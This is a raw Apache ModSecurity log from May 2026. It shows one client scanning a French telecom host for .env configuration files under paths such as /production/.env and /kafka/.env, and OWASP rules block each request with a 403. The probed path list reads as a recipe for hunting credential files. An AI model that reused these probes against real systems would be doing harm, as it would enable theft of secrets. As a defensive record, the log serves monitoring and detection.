[Mon May 11 15:50:22.308554 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rabbitmq/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/rabbitmq/.env"] [unique_id "agHenqt2WtvoFr7xvGzdIwAAAIk"]
[Mon May 11 15:50:22.308933 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/rabbitmq/.env"] [unique_id "agHenqt2WtvoFr7xvGzdIwAAAIk"]
[Mon May 11 15:50:22.309118 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/rabbitmq/.env"] [unique_id "agHenqt2WtvoFr7xvGzdIwAAAIk"]
[Mon May 11 15:50:22.401484 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kafka/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/kafka/.env"] [unique_id "agHenqt2WtvoFr7xvGzdJgAAAIk"]
[Mon May 11 15:50:22.401982 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/kafka/.env"] [unique_id "agHenqt2WtvoFr7xvGzdJgAAAIk"]
[Mon May 11 15:50:22.402294 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/kafka/.env"] [unique_id "agHenqt2WtvoFr7xvGzdJgAAAIk"]
[Mon May 11 15:50:22.495389 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /queue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/queue/.env"] [unique_id "agHenqt2WtvoFr7xvGzdKgAAAIk"]
[Mon May 11 15:50:22.495876 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/queue/.env"] [unique_id "agHenqt2WtvoFr7xvGzdKgAAAIk"]
[Mon May 11 15:50:22.496120 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/queue/.env"] [unique_id "agHenqt2WtvoFr7xvGzdKgAAAIk"]
[Mon May 11 15:50:22.594247 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /worker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/worker/.env"] [unique_id "agHenqt2WtvoFr7xvGzdKwAAAIk"]
[Mon May 11 15:50:22.594719 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/worker/.env"] [unique_id "agHenqt2WtvoFr7xvGzdKwAAAIk"]
[Mon May 11 15:50:22.594946 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/worker/.env"] [unique_id "agHenqt2WtvoFr7xvGzdKwAAAIk"]
[Mon May 11 15:50:22.696116 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /job/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/job/.env"] [unique_id "agHenqt2WtvoFr7xvGzdLAAAAIk"]
[Mon May 11 15:50:22.696595 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/job/.env"] [unique_id "agHenqt2WtvoFr7xvGzdLAAAAIk"]
[Mon May 11 15:50:22.696823 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/job/.env"] [unique_id "agHenqt2WtvoFr7xvGzdLAAAAIk"]
[Mon May 11 15:50:22.789643 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agHenqt2WtvoFr7xvGzdLgAAAIk"]
[Mon May 11 15:50:22.790086 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agHenqt2WtvoFr7xvGzdLgAAAIk"]
[Mon May 11 15:50:22.790308 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/test/.env"] [unique_id "agHenqt2WtvoFr7xvGzdLgAAAIk"]
[Mon May 11 15:50:22.883638 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agHenqt2WtvoFr7xvGzdLwAAAIk"]
[Mon May 11 15:50:22.884111 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agHenqt2WtvoFr7xvGzdLwAAAIk"]
[Mon May 11 15:50:22.884334 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/qa/.env"] [unique_id "agHenqt2WtvoFr7xvGzdLwAAAIk"]
[Mon May 11 15:50:23.169346 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /preview/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/preview/.env"] [unique_id "agHen-SQ-m-m0ukSShuLAAAAAUk"]
[Mon May 11 15:50:23.170765 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/preview/.env"] [unique_id "agHen-SQ-m-m0ukSShuLAAAAAUk"]
[Mon May 11 15:50:23.171289 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/preview/.env"] [unique_id "agHen-SQ-m-m0ukSShuLAAAAAUk"]
[Mon May 11 15:50:23.265649 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agHen-SQ-m-m0ukSShuLAQAAAUk"]
[Mon May 11 15:50:23.266354 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agHen-SQ-m-m0ukSShuLAQAAAUk"]
[Mon May 11 15:50:23.266583 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agHen-SQ-m-m0ukSShuLAQAAAUk"]
[Mon May 11 15:50:23.363860 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uat/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/uat/.env"] [unique_id "agHen-SQ-m-m0ukSShuLAgAAAUk"]
[Mon May 11 15:50:23.364395 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/uat/.env"] [unique_id "agHen-SQ-m-m0ukSShuLAgAAAUk"]
[Mon May 11 15:50:23.364711 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/uat/.env"] [unique_id "agHen-SQ-m-m0ukSShuLAgAAAUk"]
[Mon May 11 15:50:23.462051 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agHen-SQ-m-m0ukSShuLAwAAAUk"]
[Mon May 11 15:50:23.462547 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agHen-SQ-m-m0ukSShuLAwAAAUk"]
[Mon May 11 15:50:23.462755 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/stage/.env"] [unique_id "agHen-SQ-m-m0ukSShuLAwAAAUk"]
[Mon May 11 15:50:23.557287 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agHen-SQ-m-m0ukSShuLBAAAAUk"]
[Mon May 11 15:50:23.557776 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agHen-SQ-m-m0ukSShuLBAAAAUk"]
[Mon May 11 15:50:23.558006 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/development/.env"] [unique_id "agHen-SQ-m-m0ukSShuLBAAAAUk"]
[Mon May 11 15:50:23.655902 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agHen-SQ-m-m0ukSShuLBQAAAUk"]
[Mon May 11 15:50:23.656421 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agHen-SQ-m-m0ukSShuLBQAAAUk"]
[Mon May 11 15:50:23.656680 2026] [security2:error] [pid 1319953:tid 1319964] [client 54.211.142.83:36426] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/production/.env"] [unique_id "agHen-SQ-m-m0ukSShuLBQAAAUk"]
